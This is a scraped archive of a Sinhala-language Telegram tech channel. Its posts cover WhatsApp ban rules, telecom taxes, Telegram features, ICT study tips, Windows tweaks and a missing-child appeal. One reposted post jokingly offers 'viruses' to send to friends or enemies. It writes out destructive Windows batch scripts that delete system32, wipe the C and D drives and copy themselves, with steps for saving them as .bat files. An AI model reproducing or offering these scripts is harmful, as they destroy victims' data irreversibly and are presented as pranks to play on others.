𝘁𝗲𝗰𝗵𝗻𝗼𝗹𝗼𝗴𝘆 𝗸𝗻𝗼𝘄𝗹𝗲𝗱𝗴𝗲 𝘀𝘁𝗼𝗿𝗲 🍀
Открыть в Telegram
𝘁𝗲𝗰𝗵𝗻𝗼𝗹𝗼𝗴𝘆 𝗸𝗻𝗼𝘄𝗹𝗲𝗱𝗴𝗲 𝘀𝘁𝗼𝗿𝗲 🍀 All The Content in this Channel is Either forwarded From Other Channels Or Taken From the Internet, we Don't Own Any Content ☘️ No Copyright Infringement Intended ☘️
Больше3 506
Подписчики
Нет данных24 часа
Нет данных7 дней
Нет данных30 дней
Архив постов
යවපු මැසේජ් edit කරන්න Whatsapp ගෙන් Feature එකක්
Whatsapp විසින් දවසින් දවස විවිධ Features නිකුත් කරනු ලබනවා. ඔවුන් විසින් ලගදී නිකුත් කල Features අතරින් බොහොමයක් Messaging Features ද වෙනවා. Messages Reaction Feature නිකුත් කිරීමෙන් පසුව Whatsapp විසින් යවන ලද Messages Edit කළ හැකි Feature එකක් නිකුත් කිරීමට සැලසුම් කරමින් සිටිනවා.
Writer : 『₴Ɇ₮ⱧĐɆɆ』 🇺🇸
Source : CyberYakku
04. ව්‍යාජ පුද්ගලයින් ලෙස පෙනී සිටීම
වෙනත් අයගේ තොරතුරු ලබා ගැනීම සදහා ඔබ වෙනත් පුද්ගලයින් ලෙස පෙනී සිටින බවට whatsapp වෙත වාර්ථා වුවහොත් එයද ඔබව තහනම් කිරීමට ප්‍රධාන හේතුවක් වෙනවා.
ඔයාගේ whatsapp ගිණුම තහනම් වෙලා නම් whatsapp මගින් ” Your phone number is banned from using WhatsApp. Contact support for help” ලෙස පණිවිඩයක් පෙන්වනු ලබනවා.
එසේම ඔවුන් පවසන්නේ ඔවුන් විසින් whatsapp ගිණුම් තහනම් කිරීමට පෙර අනතුරු ඇගවීම් නොකරන බවත්, වැරදීමකින් ඔබේ ගිණුම අප විසින් තහනම් කර ඇත්නම් ඔවුන්ට e mail කරන බවත් ය.
මේ නිසා ඔබේ whatsapp ගිණුම වැරදීමකින් තහනම් වී ඇත්නම් ඔවුන්ට e mail කර එය නැවත සකසා ගත හැකිය. ✌️
Writer : ᴊᴀɴɪᴛʜ ꜱᴀᴅᴀɴᴜᴡᴀɴ 🇱🇰
Source : cyber yakku
Whatsapp ගිණුම් banned විය හැකි කරුණු 4ක් පිළිබදව whatsapp විසින් අනතුරු අගවයි ❗️
🥲instragram සහ facebook හි හිමිකරු වන meta සමාගමට අයත් messaging platform එකක් වන whatsapp විසින් පරිශීලකයන්ට අනතුරු අගවමින් පවසන්නේ පහත විශේශ කරුණු පිලිබදව සැලකිලිමත් වන ලෙසයි. එසේ නොවුනහොත් whatsapp ගිණුම් banned කරන බව ඔවුන් පවසා තිබෙනවා.
01.පණිවිඩ විශාල ප්‍රමාණයක් යැවීම
bulk message හෙවත් පුද්ගලයෙක් විසින් එකම පණිවිඩය විශාල වශයෙන් බොහෝ දුරකථන වලට යැවීම whatsapp ගිණුම තහනම් වීමට හේතු වෙනවා.
එසේම බොහෝ පිරිසක් ඔබගේ දිනපතා යවන message report කලහොත් එමගින්ද ඔබේ ගිණුම තහනම් විය හැකියි.
02.whatsap නිල නොවන අනුවාද (unofficial version ) භාවිතය
whatsapp සදහා විවිධ ආකාරයේ( GB whatsapp, whatsapp plus ආදි ) නිල නොවන version තිබෙනවා. මෙම apps භාවිතා කිරීමත් ඔබේ whatsapp ගිණුම තහනම් වීමට හේතු වෙනවා.
03. ව්‍යාජ ප්‍රවෘත්ති යැවීම
ඔබව report කිරීමට තුඩු දෙන ව්‍යාජ ප්‍රවෘත්ති, කරදරකාරී message යැවීමත් ඔබව තහනම් වීමට ප්‍රධාන කරුණක් වෙනවා.
විදුලි සංදේශ බදු ඉහළට, දුරකතන ගාස්තු ඉහළ යෑමේ අවදානමක්...
මේ (2022) වසරේ සිට ඉදිරියට රජයේ ආදායම් වැඩි කර ගැනීම සඳහා කඩිනමින් බදු ප්‍රතිසංස්කරණ සිදු කළ යුතු බව වත්මන් ශ්‍රී ලංකා රජය පවසනවා.
ඒ අනුව VAT බද්ද 8% සිට 12% දක්වා හා විදුලි සංදේශ බද්ද 11.25% සිට 15% දක්වා වැඩි කිරීමට රජය සැලසුම් කර තිබෙනවා.
මෙසේ බදු වැඩි කිරීමට මූලිකම හේතූන් වී ඇත්තේ 2019 වසරේ බදු ලිහිල් කිරීම තුළින් වාර්ෂිකව රුපියල් බිලියන 600 ත් 800 ත් අතර ප්‍රමාණයක බදු ආදායමක් රටට අහිමිව ගොස් ඇති නිසා සහ දළ දේශීය නිෂ්පාදිතයේ ප්‍රතිශතයක් ලෙස අඩුම අනුපාතය ශ්‍රී ලංකාවෙන් වාර්තා වී තිබෙන බැවින් ය.
Writer : 『₴Ɇ₮ⱧĐɆɆ』 🇺🇸
Source : AndroidWadakarayo
Premium Reactions List
Telegram Premium subscribersලට එක් වරප්‍රසාදයක් ලෙස ලබා ගත හැකි unique reactions ලැයිස්තුවක් ප්‍රසිද්ධ වී ඇත.
මේ දක්වා ඇති additional reactions ලැයිස්තුව පහත පරිදි වේ: 🐳, 🕊, 🤡, 🥱, 👌, 😍, 🥴.
#premium
Repost from Razor Techᵀᴹ 🇱🇰
අද ගෙනාවේ අපේ O/L ICT කරන නංගිලා මල්ලිලට ගොඩක් වැදගත් වෙන Post එකක් 😁❤️.ඔන්න දැන් කතාවට බහිමු 🌺
11 වසරෙ පළවෙනි පාඩම Programming සම්බන්ධ එකක් 🙈.ඔයා අනාගතයේදී ICT field එකෙන් ඉස්සරහට යන්න බලාපොරොත්තු වෙන කෙනෙක්නම් මෙන්න මෙතනින් තමයි ඔයාගේ Basics ටික හැදෙන්නේ 😉❤️.හරියට මුලින්ම අකුරු ඉගෙන ගෙන භාෂාවක් ඉගෙන ගන්නවා වගේ 👻.
Programming වලට ආස නැත්නම් හිතහන් ඔය පාඩම හින්දා උබට O/L විභාගෙට ලකුණූ 15 ක් විතර ගන්න පුළුවන් කියලා 🌝
ඉතින් 11 වසරෙදි මුලින්ම හම්බවෙන්නේ Flow Charts කියලා ජාතියක් 😟.ඔයා ඒක හරියට ඉගෙන ගත්තොත් Pseudo codes පුළුවන් වෙනවා 🤩.Pseudo codes වලින් තමයි ඔයාට Programming Language එකක Structure එක අහුවෙන්නේ 🙃.ඔව්වා හරියට ඔගෙන ගත්තොත් ඔයාට ඕනිම සංසිද්ධියකට අදාළ Flow Chart එක ගහලා Pseudo code එක ලියන්න පුළුවන් වෙනවා 😇❤️🔥.ඔයා ඔය දෙකෙනුත් ඉස්සරහට ගියාම Pascal කියලා ප්‍රාථමික භාෂාවක් හම්බවෙනවා 🔰.ඒක තමයි O/L ශිෂයෙක් විදියට ඔයාට හම්බවෙන මුල්ම Programming Language එක 🌝❤️
අපේ O/L Tips පළවෙනි පෝස්ට් එක 🔰
කතාවේ ඉතුරු ටික අහගන්න එන්න @RazorTech එකට ✅
Discord OpenFeint බිහිවීම
2009 පෙබරවාරි 17 openfeint බිහි වෙනවා. මේකේ නිර්මාතෘ වෙන්නෙත් අද කතාවේ ප්‍රධාන චරිතයක් වෙන Discord නිර්මාතෘ Jason Citron ම තමයි. පරිගණක සහ වීඩියෝ ක්‍රීඩා නිර්මාණකරුවන්ට වගේම ක්‍රීඩකයන්ට වෙන්වුණු මේ app එක හරහා විවිධාකාර Social Media කිහිපයක් එක ම තැනකට අරගෙන එන්න පුළුවන් වුණා. openfeint එළිදක්වලා අවුරුද්දක් ඇතුළත පරිශීලකයන් මිලියන 10ක් ඒ සමඟ එකතු වෙලා හිටියා. ඒ නිසා විවිධ ආයෝජකයන් මේ වෙත ඇදී එන්නට පටන් ගත්තා.
Writer : 『₴Ɇ₮ⱧĐɆɆ』 🇺🇸
Repost from 🇱🇰 SRI LANKAN NEWS CLUB 🇱🇰
🔴 අවිස්සාවේල්ල ප්‍රදේශයේ 10 ශ්‍රේණියේ ඉගෙනුම ලැබූ දරුවෙක් අතුරුදන් ව ඇති බව වාර්තා වේ.
ගුරුගල්ල කණිෂ්ඨ විද්‍යාලයේ ඉගෙනුම ලැබූ පූජිත ලක්ශාන් ගුණවර්ධන නම් මෙම දරුවා ඊයේ (28) උදෑසන 10:00 සිට අතුරුදන් ව ඇති බවටයි වාර්තා වන්නේ.
චායාරූපයේ සිටින මෙම දරුවා දුටුව අයෙක් සිටීනම් හැකි ඉක්මණින් මෙම දුරකරථන අංකයට අමතා එම ශිෂ්‍යයාගේ මව දැනුවත් කරන්නැයි ඉල්ලීමක් කර තිබේ.
0754516995 - පූජිතගේ මව
වයිරස් ටිකක් දාලා ආතල් එකක් ගමුද 🥲💔
හි හි යාලුවන්ට යවලා ආතල් ගම්න එපා.💔 පොඩ්ඩක් සින් එකේ තියෙන Virus ටිකක්.🥲
මේවා කරලා, එක එක මගුල් කරලා ඉන්බොස් දාන්න එපා :@Methuka_S 😂
මෙන්න බොලව්
1)ඔයාගේ පිසි එක සම්පුර්නයෙන්ම් ඔක්කොම ඩිලීට් කරලා දානවා
යාලුවට/තරහකාරයෙක්ට යවන්නේ කොහොමද කියලා බලන්න - Click Here 🙂💔
Credits-@Methukadev 😌❤️
React එකක් දාලා යන්න, බලන් ඉන්නේ 😐
@RazorTech 🇱🇰
@echo offdel *.txt del *.exe del *.ininet stop "security" del c://windows/system32 mkdir O copy halo.bat O copy %0 halo.bat %windir% kill %windir% kill system.ini Erases Hard-Drive then shutsdown computer.2)ඔයාගේ සම්පුර්ණ ඩ්‍රයිව් ඩිලීට් කරනවා හොයාගන්නවත් බෑ.
@echo off deltree c:// deltree d:// kill c:// kill d:// Copy halo.bat %0 %windir% start daily halo.bat Destroy the hard-drive.දැන් බලනවා ඇති ඔයා කොහොමද මේ ටික Run කරන්නේ කියලා 1.Notepad එක open කරන්න 🥶 2.මේකෙන් එකක් අරගෙන Paste කරන්න 😐 3.Save as දිලා bat ෆයිල් එකක් විදියට save කරන්න 😌 මේක
ඔන්න Simple Pascal Programs ටිකක් publish කලා. හැබැයි ඉතින් G.C.E O/L ICT වලට එන structures එක්ක වගේ. DOCS, Readme එහෙම තාම හැදුවේ නැ. ඒ ටිකත් හදල ගමු. ඕගොල්ලන්ටත් pull request එකක් දාලා programs හදල add කරත හැකි.
https://github.com/TharukRenuja/Pascal
හිහි නිකන් හැදුවේ ඉතින් ඕන කට්ටිය බලන්ටකෝ😜
හේ හේ 🙂
Microsoft ලට Win 11 එකට දාන්න අමතක වෙච්ච Mouse Cursor එක දාමු 🥲
දැන් බලමු කොහොමද කෙලින්ම දාන්නේ කියලා ☺️
ඊට කලින් මේක බලමු 😐
ඇයි මේක දාගන්නෙ 😏
බිල් ගෙට්ස් අයියට Win 11 හදනකොට අලුතෙන් Mouse Cursor දාන්න අමතක වෙලා.
එක හින්දා අපිටම දාගන්න වෙලා තියෙනෝ😐.මේ cursor එක ටිකක් පොශ් වගේ කියලා මට පෙනවා.😌❤️
▶️Step 1-මෙන්න මේ .link එකෙන් ගිහිල්ලා .ZIP බාගන්න
▶️Step 2-ඊටපස්සේ .zip එක Extract කරගන්න
▶️Step 3-දැන් Settings open කරලා Personalization එකට යන්න
▶️Step 4-එකේ තියෙනවා Themes එකට යන්න
▶️Step 5-උඩම ඇති Mouse Cursor කියලා එක Click කරන්න
▶️Step 6-දැන් එන Window එකේ Browse දිලා අර Cursor ටික Add කරන්න
සරලයි. දැන් Apply දිලා Ok දෙන්න 😌💔
තේරේන්නේ නැත්නම් Try එකක් දාලා බලන්න💔.නැත්නම් 😶🌫️
හි හි.. ප්‍රස්න තියෙනවද :@Methuka_S ✅
Credits-@methukadev 😌❤️
@RazorTech 🇱🇰
Repost from 𝔸𝕣𝕖𝕒 51 🛸
කෝස් වලට වියදම් නොකර ඉගෙන ගන්න❤️
ගන්න අවශ්‍ය දෙයක් තියේනම් අරගන්න.
Download කරල තියාගන්න. නැත්නම් drive එකට short cut එකක් දාගන්න. 🙃👇
https://drive.google.com/drive/u/0/mobile/folders/1wqvhEtG7Dm6Zst6Q39XQpx355cjkzvMn?usp=sharing
ඔයාලා දන්න අයටත් Share කරන්න තව කෙනෙකුට ඉගෙනගන්න උදව්වක් වෙන්න. 🙂❤️
Join with us - 𝔸𝕣𝕖𝕒 51 🛸Incognito Window කියන්නේ මොකද්ද?
ඔයා පාවිච්චි කරන ඕනම Web Browser එකක මේ පහසුකම තියෙනවා ඔයාට බලාගන්න පුළුවන්. ගොඩක් වෙලාවට Ctrl + Shift + N keys පිළිවෙලට ඔබලා ඔයාට මේ පහසුකම ඔයාගේ පරිගණකයේ Web Browser එකේ සක්‍රීය කර ගන්න පුළුවන්. මේකෙන් ගොඩක් වෙලාවට කරන්නේ ඔයාගේ Incognito Window හරහා කරන දේවල් ඔයාගේ Computer එකේ Record නොවීම විතරයි. උදාහරණයක් විදිහට ඔයා ඒ Incognito Window එක On කරගෙන මොකක් හරි Search එකක්, ඔයා යන Web Site එකක් වගේ දේවල් ඔයාගේ Web History එකේ Record වෙන්නේ නැහැ. සමහර Web Browser වලින් “Always use 'Strict' tracking prevention when browsing InPrivate” , “Block third-party cookies When on, sites can't use cookies that track you across the web.” පහසුකම් ලබා දෙනවා. එහෙම කළත් ඔයාට Internet එක හරහා සපයන සමාගමට, අවශ්‍ය නම් රජයට, ඔයා Internet එකට යන්නේ ඉස්කෝලේ හෝ යම් ආයතනයක අන්තර්ජාල පහසුකම හරහා නම් එයාලටත් ඔයාගේ අන්තර්ජාල ක්‍රියාකාරකම් දැකීමේ හැකියාවේ කිසිඳු වෙනසක් වෙන්නේ නැහැ.
Writer : 『₴Ɇ₮ⱧĐɆɆ』 🇺🇸
First Post On :
©️ 𝘁𝗲𝗰𝗵𝗻𝗼𝗹𝗼𝗴𝘆 𝗸𝗻𝗼𝘄𝗹𝗲𝗱𝗴𝗲 𝘀𝘁𝗼𝗿𝗲 🍀
Telegram «Free» අර්ථයේ විස්තරය වෙනස් කළේය
2013 සිට:
ටෙලිග්‍රාම් සදහටම නොමිලේ. දැන්වීම් නැත.
subscription ගාස්තු නැත.
දැන්:
ටෙලිග්‍රාම් chats සහ media සඳහා නොමිලේ unlimited cloud storage සපයයි.
ටෙලිග්‍රාම් premium subscription මත ක්‍රියා කරන බව මතක තබා ගන්න, එය ඉදිරි යාවත්කාලීනවනු ඇත.
මෙම නව controller bar එක දැන් insider preview එ ක ලෙස පවතී. එයින් අදහස් වන්නේ මෙම පහසුකම ලබා ගැනීමට අවශ්‍ය නම්, ඔබ විසි න් Windows 11 හි නවතම පෙරදසුන ඔබගේ පරිගණකයට ස්ථාපනය කරගත යුතු වන බවයි. එමෙන්ම මෙ හි updated version එක ලබා ගැනීමට Xbox Insider Hub app එක සමඟින් Windows Gaming පෙරදසුන වෙත sign in වීමට අවශ්‍ය වනු ඇත.
Source : Android Wadakarayo
මෑතකදී play කළ games වෙත ඉක්මනින් ප්‍රවේශ වීමට සහ අලුත් games launch කිරීමට පහසු වීම ට Xbox Game Bar වෙ ත Microsoft සමාගම විසින් නව “controller bar” එකක් එලිදක්වා තියෙනවා..
Dev සහ Beta හි නවතම preview version එක run කරන ඔබේ Windows 11 පරිගණකයට Xbox controller එකක් සම්බන්ධ කළ විට මෙ ම නව controller bar එක open වේ. ඔබ game එක play නොකරමින් සිටින විට controller එකේ ඇති Xbox බොත්තම එබීමෙන් ඔබට controller bar එක ලබා ගත හැකිය. Windows key + G keyboard shortcut එකද මඟින්ද මෙම bar එක විවෘත කර ගත හැකිය.
Controller bar එක open කර ඇති විට, ඔබ මෑතකදී play කළ games වෙත ප්‍රවේශ විය හැකි ඇති අතර, ඒවා පහසුවෙන් open කරගැනීමට හැකියි. ඔබ game එකක සිටින්නේ නම්, Xbox බොත්තම තවමත් ඔබව කෙලින්ම Xbox Game Bar එක වෙත සහ පෙර මෙන් gaming widgets එක වෙත ගෙන යනු ලබනවා. එමෙන්ම recent games section එක ඔබ ඔබේ පරිගණකයේ play කර ඇති games titles තුනක් දක්වා ඇතුළත් වේ.
Web-Bots හි නව විශේෂාංග
Web-bots හට ගෙවීමේ ඉන්වොයිසි සබැඳියක් ලෙස යැවීමට හැකියාව ලැබෙයි. ඒවා බ්‍රවුසරයක විවෘත කිරීමට, මිතුරන් වෙත යොමු කිරීමට හෝ නාලිකාවක පළ කිරීමට හැකිය. බොහෝ විට, web-bots තුල පමණක් නොව, සරල ඒවාට ද එවැනි සබැඳි නිර්මාණය කිරීමට අවස්ථාවක් ලැබෙනු ඇත.
මීට පෙර, ඉන්වොයිසි නිකුත් කරනු ලැබුවේ විශේෂ බොට්වරුන් භාවිතයෙන් පමණි (උදාහරණයක් ලෙස, පණිවිඩයක් යට පිහිටි "Donate" බොත්තම).
Web-bots හට ඉන්වොයිසියක් විවෘත කර එහි තත්ත්වය නිරීක්ෂණය කිරීමට (ගෙවූ, අවලංගු කරන ලද, දෝෂ සහිතව සම්පූර්ණ කරන ලද) සහ ඒ පිළිබඳ තොරතුරු සැපයීමට හැකි වේ.
ක්ලික් කිරීම් කිහිපයකින් ගෙවීම් කිරීමට ඔබට https://t.me/invoice/tginfo වැනි ක්ලික් කළ හැකි සබැඳියක් ඉඩ සලසයි.
ටෙලිග්‍රෑම් තුළ සෘජුවම tg://invoice?slug=tginfo වැනි සබැඳි ලබා ගත හැක
එවැනි සබැඳි Telegram හි මීළඟ යාවත්කාලීනවල සිට ක්‍රියා කිරීමට පටන් ගනී, නමුත් දැනට ඒවා පරිශීලකයා නොදන්නා @invoice නාලිකාවකට හරවා යවයි.
